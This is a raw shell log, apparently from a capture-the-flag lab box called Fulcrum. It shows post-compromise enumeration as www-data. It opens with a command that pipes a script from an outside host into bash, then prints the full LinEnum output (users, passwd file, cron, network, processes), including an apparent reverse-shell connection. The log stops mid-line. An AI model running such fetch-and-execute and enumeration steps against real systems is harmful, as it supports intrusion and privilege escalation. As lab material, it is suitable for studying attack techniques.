www-data@Fulcrum:/$ curl 10.10.14.7:8000/linenum.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--    67 45639   67 30763    0     0  28080      0  0:00:01  0:00:01 --:--:-- 28100 45639  100 45639    0     0  32832      0  0:00:01  0:00:01 --:--:-- 32833

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sun Aug 11 08:04:08 BST 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux Fulcrum 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-96-generic (buildd@lgw01-10) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
Fulcrum


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
blueprint        pts/4    10.10.14.2       Thu Nov 30 15:03:53 +0000 2017


[-] Who else is logged on:
 08:04:08 up 1 day,  3:07,  0 users,  load average: 0.07, 0.14, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=1000(blueprint) gid=1000(blueprint) groups=1000(blueprint),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare),118(libvirtd)
uid=109(colord) gid=117(colord) groups=117(colord)
uid=64055(libvirt-qemu) gid=115(kvm) groups=115(kvm)
uid=110(libvirt-dnsmasq) gid=118(libvirtd) groups=118(libvirtd)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(blueprint) gid=1000(blueprint) groups=1000(blueprint),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare),118(libvirtd)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
blueprint:x:1000:1000:blueprint,,,:/home/blueprint:/bin/bash
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:64055:115:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:110:118:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin


[-] Super user account(s):
root


[-] Accounts that have recently used sudo:
/home/blueprint/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root      root      4.0K Oct  1  2017 .
drwxr-xr-x 23 root      root      4.0K Oct 24  2017 ..
drwxr-xr-x  6 blueprint blueprint 4.0K Nov 20  2017 blueprint


### ENVIRONMENTAL #######################################
[-] Environment information:
TERM=screen
USER=www-data
PWD=/
SHLVL=3
HOME=/var/www
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x   2 root root 4096 Oct  4  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--   1 root root  589 Jul 16  2014 mdadm
-rw-r--r--   1 root root  670 Mar  1  2016 php

/etc/cron.daily:
total 44
drwxr-xr-x   2 root root 4096 Oct  1  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  376 Mar 31  2016 apport
-rwxr-xr-x   1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x   1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root 1029 Aug 11  2017 libvirt-bin
-rwxr-xr-x   1 root root  372 May  6  2015 logrotate
-rwxr-xr-x   1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Oct  1  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Oct  1  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Oct  1  2017 .
drwxr-xr-x 103 root root 4096 Oct  4  2017 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root  211 May 24  2016 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Systemd timers:
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Sun 2019-08-11 12:06:37 BST  4h 2min left  Sun 2019-08-11 05:08:29 BST  2h 55min ago snap-repair.timer            snap-repair.service
Sun 2019-08-11 12:24:03 BST  4h 19min left Sat 2019-08-10 22:35:51 BST  9h ago       apt-daily.timer              apt-daily.service
Mon 2019-08-12 00:42:34 BST  16h left      Sat 2019-08-10 07:30:35 BST  24h ago      snapd.refresh.timer          snapd.refresh.service
Mon 2019-08-12 05:11:35 BST  21h left      Sun 2019-08-11 05:11:35 BST  2h 52min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2019-08-12 06:11:37 BST  22h left      Sun 2019-08-11 06:10:32 BST  1h 53min ago apt-daily-upgrade.timer      apt-daily-upgrade.service

5 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
corp      Link encap:Ethernet  HWaddr 52:54:00:87:ee:c0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:793 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:75580 (75.5 KB)  TX bytes:0 (0.0 B)

corp-nic  Link encap:Ethernet  HWaddr 52:54:00:87:ee:c0
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ens32     Link encap:Ethernet  HWaddr 00:50:56:bf:fc:f1
          inet addr:10.10.10.62  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:febf:fcf1/64 Scope:Global
          inet6 addr: fe80::250:56ff:febf:fcf1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9041 errors:0 dropped:66 overruns:0 frame:0
          TX packets:66449 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:741932 (741.9 KB)  TX bytes:5302606 (5.3 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:320 errors:0 dropped:0 overruns:0 frame:0
          TX packets:320 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:22927 (22.9 KB)  TX bytes:22927 (22.9 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:9c:e7:10
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:219266 errors:0 dropped:0 overruns:0 frame:0
          TX packets:195748 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:7195445 (7.1 MB)  TX bytes:8221416 (8.2 MB)

virbr0-nic Link encap:Ethernet  HWaddr 52:54:00:9c:e7:10
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:32:d7:13
          inet6 addr: fe80::fc54:ff:fe32:d713/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:31677 errors:0 dropped:0 overruns:0 frame:0
          TX packets:79922 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2926303 (2.9 MB)  TX bytes:5594313 (5.5 MB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:74:9d:17
          inet6 addr: fe80::fc54:ff:fe74:9d17/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:219266 errors:0 dropped:0 overruns:0 frame:0
          TX packets:244519 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:10265169 (10.2 MB)  TX bytes:10757740 (10.7 MB)

vnet2     Link encap:Ethernet  HWaddr fe:54:00:32:59:e0
          inet6 addr: fe80::fc54:ff:fe32:59e0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6525 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63324 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:461726 (461.7 KB)  TX bytes:3820717 (3.8 MB)

vnet3     Link encap:Ethernet  HWaddr fe:54:00:82:69:f5
          inet6 addr: fe80::fc54:ff:fe82:69f5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12692 errors:0 dropped:0 overruns:0 frame:0
          TX packets:69203 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:977570 (977.5 KB)  TX bytes:4242419 (4.2 MB)

vnet4     Link encap:Ethernet  HWaddr fe:54:00:01:c6:b8
          inet6 addr: fe80::fc54:ff:fe01:c6b8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14554 errors:0 dropped:0 overruns:0 frame:0
          TX packets:55290 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1284445 (1.2 MB)  TX bytes:2997738 (2.9 MB)

vnet5     Link encap:Ethernet  HWaddr fe:54:00:8f:b9:f9
          inet6 addr: fe80::fc54:ff:fe8f:b9f9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:18459 errors:0 dropped:0 overruns:0 frame:0
          TX packets:60799 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2080399 (2.0 MB)  TX bytes:3842674 (3.8 MB)

web       Link encap:Ethernet  HWaddr 52:54:00:15:08:7e
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1930 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:243255 (243.2 KB)  TX bytes:0 (0.0 B)

web-nic   Link encap:Ethernet  HWaddr 52:54:00:15:08:7e
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


[-] ARP history:
? (10.10.10.2) at 00:50:56:bf:e0:44 [ether] on ens32
? (192.168.122.228) at 52:54:00:74:9d:17 [ether] on virbr0


[-] Nameserver(s):
nameserver 8.8.8.8


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens32


[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:4               0.0.0.0:*               LISTEN      1136/nginx: worker
tcp        0      0 0.0.0.0:56423           0.0.0.0:*               LISTEN      1136/nginx: worker
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1136/nginx: worker
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1136/nginx: worker
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:88              0.0.0.0:*               LISTEN      1136/nginx: worker
tcp        0    116 10.10.10.62:56978       10.10.14.7:1234         ESTABLISHED 15717/php-fpm: pool
tcp6       0      0 :::80                   :::*                    LISTEN      1136/nginx: worker
tcp6       0      0 :::22                   :::*                    LISTEN      -


[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 192.168.122.1:53        0.0.0.0:*                           -
udp        0      0 10.10.10.62:37138       8.8.8.8:53              ESTABLISHED -


### SERVICES #############################################
[-] Running processes:
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.0  37784  4232 ?        Ss   Aug10   0:10 /sbin/init
root          2  0.0  0.0      0     0 ?        S    Aug10   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    Aug10   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    Aug10   0:25 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    Aug10   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    Aug10   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S    Aug10   0:00 [watchdog/0]
root         11  0.0  0.0      0     0 ?        S    Aug10   0:00 [watchdog/1]
root         12  0.0  0.0      0     0 ?        S    Aug10   0:00 [migration/1]
root         13  0.0  0.0      0     0 ?        S    Aug10   0:00 [ksoftirqd/1]
root         15  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/1:0H]
root         16  0.0  0.0      0     0 ?        S    Aug10   0:00 [watchdog/2]
root         17  0.0  0.0      0     0 ?        S    Aug10   0:00 [migration/2]
root         18  0.0  0.0      0     0 ?        S    Aug10   0:00 [ksoftirqd/2]
root         19  0.0  0.0      0     0 ?        S    Aug10   0:47 [kworker/2:0]
root         20  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/2:0H]
root         21  0.0  0.0      0     0 ?        S    Aug10   0:00 [watchdog/3]
root         22  0.0  0.0      0     0 ?        S    Aug10   0:00 [migration/3]
root         23  0.0  0.0      0     0 ?        S    Aug10   0:00 [ksoftirqd/3]
root         25  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/3:0H]
root         26  0.0  0.0      0     0 ?        S    Aug10   0:00 [kdevtmpfs]
root         27  0.0  0.0      0     0 ?        S<   Aug10   0:00 [netns]
root         28  0.0  0.0      0     0 ?        S<   Aug10   0:00 [perf]
root         29  0.0  0.0      0     0 ?        S    Aug10   0:00 [khungtaskd]
root         30  0.0  0.0      0     0 ?        S<   Aug10   0:00 [writeback]
root         31  0.0  0.0      0     0 ?        SN   Aug10   0:00 [ksmd]
root         32  0.0  0.0      0     0 ?        SN   Aug10   0:03 [khugepaged]
root         33  0.0  0.0      0     0 ?        S<   Aug10   0:00 [crypto]
root         34  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kintegrityd]
root         35  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         36  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kblockd]
root         37  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ata_sff]
root         38  0.0  0.0      0     0 ?        S<   Aug10   0:00 [md]
root         39  0.0  0.0      0     0 ?        S<   Aug10   0:00 [devfreq_wq]
root         44  0.0  0.0      0     0 ?        S    Aug10   0:03 [kswapd0]
root         45  0.0  0.0      0     0 ?        S<   Aug10   0:00 [vmstat]
root         46  0.0  0.0      0     0 ?        S    Aug10   0:00 [fsnotify_mark]
root         47  0.0  0.0      0     0 ?        S    Aug10   0:00 [ecryptfs-kthrea]
root         63  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kthrotld]
root         64  0.0  0.0      0     0 ?        S<   Aug10   0:00 [acpi_thermal_pm]
root         65  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         66  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         67  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         68  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         69  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         70  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         71  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         72  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root         73  0.0  0.0      0     0 ?        S    Aug10   0:31 [scsi_eh_0]
root         74  0.0  0.0      0     0 ?        S<   Aug10   0:00 [scsi_tmf_0]
root         75  0.0  0.0      0     0 ?        S    Aug10   0:00 [scsi_eh_1]
root         76  0.0  0.0      0     0 ?        S<   Aug10   0:00 [scsi_tmf_1]
root         83  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ipv6_addrconf]
root         96  0.0  0.0      0     0 ?        S<   Aug10   0:00 [deferwq]
root         97  0.0  0.0      0     0 ?        S<   Aug10   0:00 [charger_manager]
root         99  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root        150  0.0  0.0      0     0 ?        S    Aug10   0:00 [scsi_eh_2]
root        151  0.0  0.0      0     0 ?        S<   Aug10   0:00 [scsi_tmf_2]
root        152  0.0  0.0      0     0 ?        S<   Aug10   0:00 [vmw_pvscsi_wq_2]
root        153  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root        168  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kpsmoused]
root        171  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ttm_swap]
root        268  0.0  0.0      0     0 ?        S<   Aug10   0:00 [raid5wq]
root        294  0.0  0.0      0     0 ?        S<   Aug10   0:00 [bioset]
root        323  0.0  0.0      0     0 ?        S    Aug10   0:04 [jbd2/sda1-8]
root        324  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ext4-rsv-conver]
root        373  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/2:1H]
root        374  0.0  0.0  35276  3652 ?        Ss   Aug10   0:01 /lib/systemd/systemd-journald
root        391  0.0  0.0      0     0 ?        S<   Aug10   0:00 [iscsi_eh]
root        399  0.0  0.0      0     0 ?        S    Aug10   0:00 [kauditd]
root        400  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ib_addr]
root        409  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/3:1H]
root        411  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ib_mcast]
root        412  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ib_nl_sa_wq]
root        414  0.0  0.0      0     0 ?        S<   Aug10   0:00 [ib_cm]
root        416  0.0  0.0      0     0 ?        S<   Aug10   0:00 [iw_cm_wq]
root        418  0.0  0.0      0     0 ?        S<   Aug10   0:00 [rdma_cm]
root        419  0.0  0.0  94772   928 ?        Ss   Aug10   0:00 /sbin/lvmetad -f
root        444  0.0  0.0  44488  3260 ?        Ss   Aug10   0:00 /lib/systemd/systemd-udevd
root        484  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kvm-irqfd-clean]
root        505  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/1:1H]
systemd+    549  0.0  0.0 100324  2068 ?        Ssl  Aug10   0:05 /lib/systemd/systemd-timesyncd
root        929  0.0  0.0  95368  1132 ?        Ssl  Aug10   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root        931  0.0  0.0 186000  3952 ?        Ssl  Aug10   1:14 /usr/bin/vmtoolsd
root        938  0.0  0.0  20100  2340 ?        Ss   Aug10   0:01 /lib/systemd/systemd-logind
root        942  0.0  0.0  29880  1236 ?        Ss   Aug10   0:00 /sbin/cgmanager -m name=systemd
root        946  0.0  0.0  29008  2256 ?        Ss   Aug10   0:00 /usr/sbin/cron -f
root        951  0.0  0.0 304632  5044 ?        Ssl  Aug10   0:00 /usr/lib/snapd/snapd
syslog      953  0.0  0.0 256400  2280 ?        Ssl  Aug10   0:02 /usr/sbin/rsyslogd -n
daemon      955  0.0  0.0  26044  2108 ?        Ss   Aug10   0:00 /usr/sbin/atd -f
root        957  0.0  0.0   4400  1264 ?        Ss   Aug10   0:00 /usr/sbin/acpid
message+    959  0.0  0.0  42900  3036 ?        Ss   Aug10   0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       1024  0.0  0.0  13376   140 ?        Ss   Aug10   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root       1070  0.0  0.0  65520  2864 ?        Ss   Aug10   0:00 /usr/sbin/sshd -D
root       1093  0.0  0.0   5224   120 ?        Ss   Aug10   0:02 /sbin/iscsid
root       1094  0.0  0.0   5724  3516 ?        S<Ls Aug10   0:11 /sbin/iscsid
root       1112  0.0  0.0 805084  4556 ?        Ssl  Aug10   0:01 /usr/sbin/libvirtd
root       1135  0.0  0.0 125244  1132 ?        Ss   Aug10   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data   1136  0.0  0.0 125572  1588 ?        S    Aug10   0:07 nginx: worker process
www-data   1137  0.0  0.0 125572  2032 ?        S    Aug10   0:00 nginx: worker process
www-data   1138  0.0  0.0 125836  3868 ?        S    Aug10   0:07 nginx: worker process
www-data   1139  0.0  0.0 125572  1548 ?        S    Aug10   0:07 nginx: worker process
root       1173  0.0  0.1 244496  9516 ?        Ss   Aug10   0:05 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root       1196  0.0  0.0  15940  1508 tty1     Ss+  Aug10   0:00 /sbin/agetty --noclear tty1 linux
www-data   1197  0.0  0.0 244824  6948 ?        S    Aug10   0:00 php-fpm: pool www
www-data   1198  0.0  0.1 246900 12204 ?        S    Aug10   0:00 php-fpm: pool www
root       1208  0.0  0.0      0     0 ?        S<   Aug10   0:00 [kworker/0:1H]
libvirt+   1524  0.0  0.0  49984  1516 ?        S    Aug10   0:00 /usr/sbin/dnsmasq --conf-file=/var/lib/libvirt/dnsmasq/default.conf --leasefile-ro --dhcp-script=/usr/lib/libvirt/libvirt_leaseshelper
root       1528  0.0  0.0 193784  3416 ?        Ssl  Aug10   0:00 /usr/sbin/virtlogd
libvirt+   1568  5.5 24.8 3433532 2025948 ?     Sl   Aug10  90:03 qemu-system-x86_64 -enable-kvm -name DC -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu Westmere -m 2048 -realtime mlock=off -smp 2,sockets=2,cores=1,threads=1 -uuid 3fe2f36c-ce5f-4907-b8d0-77f992d9e3c4 -nographic -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-DC/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x5.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x5 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x5.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x5.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x4 -drive file=/var/lib/libvirt/images/DC.vmdk,format=vmdk,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=25,id=hostnet0 -device 